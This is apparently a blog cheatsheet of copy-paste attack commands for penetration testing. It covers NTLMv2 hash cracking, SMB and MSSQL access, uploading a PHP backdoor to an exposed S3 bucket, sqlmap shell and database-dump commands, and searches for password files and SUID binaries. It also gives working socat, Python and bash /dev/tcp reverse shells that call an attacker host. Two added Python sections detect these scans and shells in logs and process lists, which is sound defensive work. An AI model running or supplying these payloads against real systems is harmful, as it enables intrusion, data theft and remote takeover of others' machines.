Hacking Cheatsheet

· rivet's blog


Multiple sections with quick hints and cheats to copy/paste.

-> Written with Parrot OS in mind, so locations may differ if you are using a different attack distro.

Passwords #

Password Cracking #

John NTLMv2 (Responder) cracking

john -w=/usr/share/wordlists/rockyou.txt <responder_output>.txt --format=netntlmv2

Windows stuff #

Enumeration #

SMB Share enumeration

smbclient -L <IP_address>

SMB Share content listing

smbclient \\\\<IP_address>\\<share>

Database stuff #

MSSQL #

More info: https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server

Connect using known creds with impacket

python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py {WINDOMAIN}/{username}:{known_pass}@{IP_address} -windows-auth

If this doesn't work and you're sure the creds are correct, try again without -windows-auth.

Things to try when using mssqlclient.py:

Mongo DB #

With local access to a machine that's running Mongo, connect to it and see if it's possible to enumerate admins:

mongo --port 27117 {db_name} --eval "db.admin.find().forEach(printjson);"

The output should contain x_shadow with a hashed version of the user's password.

Web stuff #

Enumeration #

Gobuster enumerate directories

gobuster dir http://location -w /usr/share/wordlists/directory-list-2.3-medium.txt -t 100

Gobuster enumerate vhosts

gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://location

S3 Bucket manipulation #

More info: https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology#public-cloud-assets

S3Scanner enumerate buckets for custom endpoint ("-u")

s3scanner -u http://s3.custom_location.blah -i scan -f /usr/share/wordlists/BucketNames.txt

For more custom endpoint examples (DO, etc.) check: https://github.com/sa7mon/S3Scanner

AWS CLI: list the contents of an insecure bucket on a custom endpoint

aws --endpoint=http://s3.custom_location.bleh s3 ls bucket_name

AWS CLI: copy a PHP shell to the bucket

aws --endpoint=http://s3.custom_location_bleh s3 cp /usr/share/webshells/php/qsd-php-backdoor.php s3://bucket_name/images/

SQL Injection #

SQLMap is great but can be noisy; it's still a good start: find an entry point and get a shell.

sqlmap -u 'http://<victim_address>/<vulnerable_page>.php?<query>=any+query' --cookie="{cookie_authentication_details}" --os-shell

WebSockets, read: https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html

The simplest way to use WebSockets with sqlmap is the script discussed in the URL above. Make sure to change ws_server to the actual endpoint identified and data to the vulnerable query. For example, if the vulnerable parameter is "id", change it to data = '{"id":"%s"}' % message.

Call sqlmap to identify databases:

sqlmap -u "http://localhost:8081/?id=1" --batch --dbs

Dump the DB contents:

sqlmap -u "http://localhost:8081/?id=1" -D db_name --tables --columns --dump-all
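As an added defender-side example (not from the original cheatsheet), here is a small Python detector that flags the traffic the Gobuster and sqlmap commands above generate in a web server's combined access log: a burst of 404s per client, the tools' default User-Agents, and URL-decoded query strings carrying injection fragments. The log lines are constructed samples and the 404 threshold is an assumption to tune per site.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in Apache/nginx "combined" log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /admin HTTP/1.1" 404 153 "-" "gobuster/3.1"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /backup HTTP/1.1" 404 153 "-" "gobuster/3.1"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /images HTTP/1.1" 301 0 "-" "gobuster/3.1"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /old HTTP/1.1" 404 153 "-" "gobuster/3.1"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /test HTTP/1.1" 404 153 "-" "gobuster/3.1"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=1%27%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.6"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=1%20UNION%20SELECT%20NULL HTTP/1.1" 500 0 "-" "Mozilla/5.0"
192.168.1.2 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# One "combined" log line: client, identity, user, timestamp, request, status, bytes, referer, UA.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Fragments typical of the probes sqlmap sends first, matched on the URL-decoded path.
SQLI_RE = re.compile(r"(?i)(union\s+select|'\s*(and|or)\s+\S+\s*=|sleep\(|benchmark\(|waitfor\s+delay)")
# Default User-Agents of gobuster and sqlmap (both tools let the operator override this).
SCANNER_UA_RE = re.compile(r"(?i)\b(gobuster|sqlmap)\b")


def analyze(log_text, min_404=4):
    """Return clients bruteforcing paths, clients with tool UAs, and SQLi-looking requests."""
    not_found = Counter()   # 404 count per client: gobuster dir produces a burst of these
    scanner_ua = {}         # first scanner User-Agent seen per client
    sqli = []               # (client, decoded path) for requests carrying injection fragments
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue        # malformed line: skip it rather than abort the whole scan
        ip, path, status, ua = m["ip"], m["path"], m["status"], m["ua"]
        if status == "404":
            not_found[ip] += 1
        if SCANNER_UA_RE.search(ua):
            scanner_ua.setdefault(ip, ua)
        decoded = unquote(path)
        if SQLI_RE.search(decoded):
            sqli.append((ip, decoded))
    return {
        "dir_bruteforce": sorted(ip for ip, n in not_found.items() if n >= min_404),
        "scanner_ua": scanner_ua,
        "sqli": sqli,
    }
```

Running analyze(SAMPLE_LOG) reports 10.0.0.5 as a directory bruteforcer and 10.0.0.9 for both the sqlmap User-Agent and the two decoded injection requests; a scanner with a spoofed User-Agent is still caught by the 404 and payload rules.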

System Checks #

Things to do when you first log in to a system

Linux #

  1. Check user id: id
  2. For every group they're a member of, find the files that group owns: find / -group {groupname} 2>/dev/null
  3. Check SUDO rights: sudo -l
  4. Check if any of those files are interesting, if they're SUID, etc.
  5. Find any files that contain the word "passw": find / -type f -exec grep -il passw {} \; 2>/dev/null or grep -irl pass / 2>/dev/null
  6. Find any files whose name partially matches "passw": find / -type f -name "*passw*" -ls 2>/dev/null
  7. Find SUID files that the user can write to and that are Bash, Zsh, Python or Perl scripts (the -name tests need grouping, otherwise the permission tests only apply to the last one): find / -type f \( -name "*.sh" -o -name "*.zsh" -o -name "*.py" -o -name "*.pl" \) -perm -u+s -writable -ls 2>/dev/null
  8. Find SUID files: find / -type f -perm -u+s -ls 2>/dev/null
  9. Run linpeas.sh
  10. Check for vhosts: cat /etc/hosts
  11. Check for alt interfaces: ip addr or ifconfig

Windows #

  1. Check user groups: whoami /all
  2. Run winpeas.bat

Shells & Reverse Shells #

Easy cheatsheet to generate shells: https://www.revshells.com/

Socat Remote Shells #

On the victim (WINDOWS):

socat tcp-connect:<attacker_ip>:8999 exec:'cmd.exe',pty,stderr,setsid,sigint,sane #'cmd.exe' has normal quotes

On the victim (Linux):

socat tcp-connect:<attacker_ip>:8999 exec:'bash -i',pty,stderr,setsid,sigint,sane #'bash' has normal quotes

Alternative using python only:

python -c 'import socket,pty,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<HOST>",8999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn(["/bin/bash","-i"]);'

On the attacker (LINUX):

socat file:`tty`,raw,echo=0 tcp-listen:8999,reuseaddr #`tty` is using backticks

Raw Python & netcat #

The advantage of SOCAT is that it can create a decent shell that functions as expected. Assuming you get a reverse shell with netcat but not SOCAT for any reason, you can execute the following inside your netcat shell to get a fully functional shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

or create a reverse shell without needing any 3rd-party software:

bash -c "bash -i >& /dev/tcp/{attacker_IP}/443 0>&1"

or, to get a functional shell, try the script command if it's available:

script /dev/null -c bash
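As an added defender-side example (not part of the original cheatsheet), the following Python rules flag the reverse-shell and TTY-upgrade one-liners listed in this section when they show up in `ps -eo pid,user,args` output. The process list is constructed, with 203.0.113.7 as a documentation-range placeholder for the attacker address.

```python
import re

# Constructed `ps -eo pid,user,args` output; 203.0.113.7 is a documentation-range placeholder.
SAMPLE_PS = """\
  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 1301 www-data bash -c bash -i >& /dev/tcp/203.0.113.7/443 0>&1
 1305 www-data socat tcp-connect:203.0.113.7:8999 exec:bash -i,pty,stderr,setsid,sigint,sane
 1310 www-data python3 -c import pty;pty.spawn("/bin/bash")
 1322 alice    python3 -c import socket,pty,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("203.0.113.7",8999));os.dup2(s.fileno(),0);pty.spawn(["/bin/bash","-i"]);
 1340 bob      script /dev/null -c bash
 1350 alice    python3 /opt/app/server.py
"""

# One regex per technique listed in this section, applied to a process's full command line.
RULES = {
    "bash_dev_tcp": re.compile(r"/dev/(tcp|udp)/\S+/\d+"),            # bash -i >& /dev/tcp/...
    "socat_exec_shell": re.compile(r"\bsocat\b.*tcp-connect:.*exec:", re.I),
    "python_socket_pty": re.compile(r"\bpython\d?\b.*\bsocket\b.*\bdup2\b.*pty\.spawn"),
    "python_pty_upgrade": re.compile(r"\bpython\d?\b.*pty\.spawn\("),  # netcat shell upgrade
    "script_tty_upgrade": re.compile(r"\bscript\s+/dev/null\s+-c\b"),
}


def classify(cmdline):
    """Return the names of every rule a command line triggers."""
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    # A python reverse shell also contains pty.spawn; report only the more specific rule.
    if "python_socket_pty" in hits and "python_pty_upgrade" in hits:
        hits.remove("python_pty_upgrade")
    return hits


def scan_process_list(ps_output):
    """Parse `ps -eo pid,user,args` output (header included) into (pid, user, rule) findings."""
    findings = []
    for line in ps_output.splitlines()[1:]:      # [1:] drops the header row
        parts = line.split(None, 2)              # pid, user, rest of line = full command line
        if len(parts) < 3:
            continue
        pid, user, args = parts
        for rule in classify(args):
            findings.append((int(pid), user, rule))
    return findings
```

The same regexes apply unchanged to auditd EXECVE records or EDR process telemetry, which is where a production detection would read them from instead of a ps snapshot.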